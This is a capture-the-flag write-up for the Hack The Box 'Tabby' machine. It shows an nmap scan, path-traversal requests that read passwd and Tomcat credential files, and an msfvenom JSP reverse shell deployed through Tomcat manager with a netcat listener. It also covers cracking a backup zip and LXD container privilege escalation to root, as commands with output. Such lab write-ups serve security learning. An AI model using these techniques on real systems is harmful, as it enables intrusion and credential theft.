Tabby HTB
Let pwn another box guys. Shall we?
If you can’t give me poetry, can’t you give me poetical science?
-Ada Lovelace
OS: Linux
Difficulty: Easy
Points: 20
Release: 20 Jun 2020
IP: 10.10.10.194
Reconnaissance:-
Information Gathering and getting to know the target systems is the first process in ethical hacking. Reconnaissance is a set of processes and techniques (Footprinting, Scanning & Enumeration) used to covertly discover and collect information about a target system.
During reconnaissance, an ethical hacker attempts to gather as much information about a target system as possible, following the seven steps listed below −
- Gather initial information
- Determine the network range
- Identify active machines
- Discover open ports and access points
- Fingerprint the operating system
- Uncover services on ports
- Map the network
Enumeration
Enumeration can be used to gain information on −
- Network shares
- SNMP data, if they are not secured properly
- IP tables
- Usernames of different systems
- Passwords policies lists
Enumerations depend on the services that the systems offer. They can be −
- DNS enumeration
- NTP enumeration
- SNMP enumeration
- Linux/Windows enumeration
- SMB enumeration
I am using Nmap tool for Enumeration
nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.194
kali@kali:/$ sudo nmap -sC -sV -oA SecNotes -vv vuln 10.10.10.194
Starting Nmap 7.80 ( https://nmap.org ) at 2020–06–21 06:48 EDT
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Failed to resolve “vuln”.
Initiating Ping Scan at 06:48
Scanning 10.10.10.194 [4 ports]
Completed Ping Scan at 06:48, 0.30s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:48
Scanning megahosting.htb (10.10.10.194) [1000 ports]
Discovered open port 80/tcp on 10.10.10.194
Discovered open port 8080/tcp on 10.10.10.194
Discovered open port 22/tcp on 10.10.10.194
Completed SYN Stealth Scan at 06:48, 3.55s elapsed (1000 total ports)
Initiating Service scan at 06:48
Scanning 3 services on megahosting.htb (10.10.10.194)
Completed Service scan at 06:48, 6.50s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.10.194.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 6.68s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.91s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Nmap scan report for megahosting.htb (10.10.10.194)
Host is up, received echo-reply ttl 63 (0.23s latency).
Scanned at 2020–06–21 06:48:30 EDT for 18s
Not shown: 997 closed ports
Reason: 997 resets
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 338ABBB5EA8D80B9869555ECA253D49D
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Mega Hosting
8080/tcp open http syn-ack ttl 63 Apache Tomcat
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelNSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 06:48
Completed NSE at 06:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.16 seconds
Raw packets sent: 1145 (50.356KB) | Rcvd: 1014 (40.560KB)
As port 20 is open lets have a try
kali@kali:/$ ssh sales@10.10.10.194
The authenticity of host ‘10.10.10.194 (10.10.10.194)’ can’t be established.
ECDSA key fingerprint is SHA256:fMuIFpNbN9YiPCAj+b/iV5XPt9gNRdvR5x/Iro2HrKo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added ‘10.10.10.194’ (ECDSA) to the list of known hosts.
sales@10.10.10.194: Permission denied (publickey).Hmm permission denied !
From the nmap results we can see that there are 3 ports open: 22, 80, 8080. We can also see that on port 8080 there is a Tomcat server running.
The website on port 80:
The website on port 8080:
After clicking on all the links on the port 80 website I found something interesting.
From here you need to do some steps. First add megahosting.htb to the /etc/hosts
After that is done we can see that we have the possibility for LFI. I ususally try to see if I can see the passwd file. In this case YES.
Ok lets search for RCE now. We need a way in (reverse shell). The website on port 8080 uses tomcat so I start googling how to exploit that with LFI. Also on this page we can see some admin portals. If you are interested please check the link: https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory
Otherwise you can copy paste the code bellow in your url bar.
http://megahosting.htb/news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xmlHow about that? Look at what we have found. Username and Password.
http://tabby/news.php?file=../../../../../../../../etc/passwdNow it is time to figure out how to exploit that when we have user and pass. I guess that there are several ways to do it but my original thought was with a msfvenom payload.
Capture with burp
So on,it have been already vulnerable and we also already known that it’s running tomcat service.Try to figure out tomcat admin cred.Some good resources to grep.
https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory
GET /news.php?file=../../../../../../../../../usr/share/tomcat9/etc/tomcat-users.xml HTTP/1.1
Host: megahosting.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1Finally, cred was tomcat:$3cureP4s5w0rd123!.Not much to thinking,research to exploit tomcat.
Multiple Ways to Exploit Tomcat Manager
kali@kali:~$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.61 LPORT=9999 -f WAR >body.war
Payload size: 1090 bytes
Final size of war file: 1090 bytesNow after generating the payload we have to upload it
kali@kali:~$ sudo curl — user ‘tomcat:$3cureP4s5w0rd123!’ — upload-file body.war “http://tabby:8080/manager/text/deploy?path=/body.war"
OK — Deployed application at context path [/body.war]Listening to get a reverse shell
kali@kali:~$ nc -lnvp 9999
listening on [any] 9999 …
connect to [10.10.14.61] from (UNKNOWN) [10.10.10.194] 37630
python3 -c ‘import pty; pty.spawn(“/usr/bin/bash”)’
tomcat@tabby:/var/lib/tomcat9$ ls
ls
conf lib logs policy webapps work
tomcat@tabby:/var/lib/tomcat9$ /var/lib/tomcat9$
/var/lib/tomcat9$
bash: /var/lib/tomcat9$: No such file or directory
tomcat@tabby:/var/lib/tomcat9$ ls
ls
conf lib logs policy webapps work
tomcat@tabby:/var/lib/tomcat9$ cd logs
cd logs/
tomcat@tabby:/var/lib/tomcat9/logs$ ls
ls
catalina.2020–05–19.log.gz localhost.2020–06–17.log.gz
catalina.2020–05–21.log.gz localhost.2020–06–20.log.gz
catalina.2020–05–22.log.gz localhost.2020–07–19.log
catalina.2020–06–16.log.gz localhost_access_log.2020–05–19.txt.gz
catalina.2020–06–17.log.gz localhost_access_log.2020–05–21.txt.gz
catalina.2020–06–20.log.gz localhost_access_log.2020–05–22.txt.gz
catalina.2020–07–19.log localhost_access_log.2020–06–16.txt.gz
localhost.2020–05–19.log.gz localhost_access_log.2020–06–17.txt.gz
localhost.2020–05–21.log.gz localhost_access_log.2020–06–20.txt.gz
localhost.2020–05–22.log.gz localhost_access_log.2020–07–19.txt
localhost.2020–06–16.log.gz
tomcat@tabby:/var/lib/tomcat9/logs$ cd ..
cd ..After some browsing the only interesting thing I found was a backup file in zip format. Download that to your local machine and use:
fcrackzip -D -p rockyou.txt 16162020_backup.zipThe result will be:
Now we can switch users
tomcat@tabby:/var/lib/tomcat9$ su — ash
su — ash
Password: admin@itash@tabby:~$ cd /home
cd /home
ash@tabby:/home$ ls
ls
ash
ash@tabby:/home$ cd ash
cd ash/
ash@tabby:~$ ls
ls
alpine-v3.12-x86_64–20200719_0201.tar.gz snap user.txt
ash@tabby:~$ cat user.txt
cat user.txt
Cool We are done with user part 😃
Getting Root
Downloading to the host
ash@tabby:~$ wget http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
<14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
--2020-06-21 17:20:54-- http://10.10.14.12:8000/alpine-v3.12-x86_64-20200621_2204.tar.gz
Connecting to 10.10.14.12:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3212312 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’
alpine-v3.12-x86_64 100%[===================>] 3.06M 67.4KB/s in 45s
2020-06-21 17:21:39 (70.2 KB/s) - ‘alpine-v3.12-x86_64-20200621_2204.tar.gz’ saved [3212312/3212312]Running in the host
ash@tabby:~$ lxc image import ./alpine-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
<ne-v3.12-x86_64-20200621_2204.tar.gz --alias liquid
If this is your first time running LXD on this machine, you should also run: lxd init
To start your first instance, try: lxc launch ubuntu:18.04
ash@tabby:~$ lxc image list
lxc image list
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+
| liquid | 1145f55bb6a7 | no | alpine v3.12 (20200621_22:04) | x86_64 | CONTAINER | 3.06MB | Jun 21, 2020 at 5:21pm (UTC) |
+--------+--------------+--------+-------------------------------+--------------+-----------+--------+------------------------------+Configuring some stuff
ash@tabby:~$ lxd init
Would you like to use LXD clustering? (yes/no) [default=no]: no
Do you want to configure a new storage pool? (yes/no) [default=yes]: yes
Name of the new storage pool [default=default]:
Name of the storage backend to use (dir, lvm, ceph, btrfs) [default=btrfs]: dir
Would you like to connect to a MAAS server? (yes/no) [default=no]: no
Would you like to create a new local network bridge? (yes/no) [default=yes]:
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]:
The requested network bridge "lxdbr0" already exists. Please choose another name.
What should the new bridge be called? [default=lxdbr0]: liquid
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]:
Would you like LXD to be available over the network? (yes/no) [default=no]:
Would you like stale cached images to be updated automatically? (yes/no) [default=yes]
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]:Running the exploit
ash@tabby:~$ lxc init liquid privesc -c security.privileged=true
Creating privesc
ash@tabby:~$ lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to privesc
ash@tabby:~$ ^C
ash@tabby:~$ lxc start privesc
ash@tabby:~$ lxc exec privesc /bin/sh
~ # id
uid=0(root) gid=0(root)
~ # cd /mnt/root
/mnt/root # ls
bin home lost+found root swap.img
boot lib media run sys
cdrom lib32 mnt sbin tmp
dev lib64 opt snap usr
etc libx32 proc srv var
/mnt/root # cd root
/mnt/root/root # wc -c root.txt
33 root.txtRoot was very simple 🚀 Getting foothold was the only important part in this box. Hope you learned a lot from this box.Feel free to ask or suggest in the comments section.I hope you liked the write up if so clap buddy 😄.
Thanks to egre55 for making this box. 👏
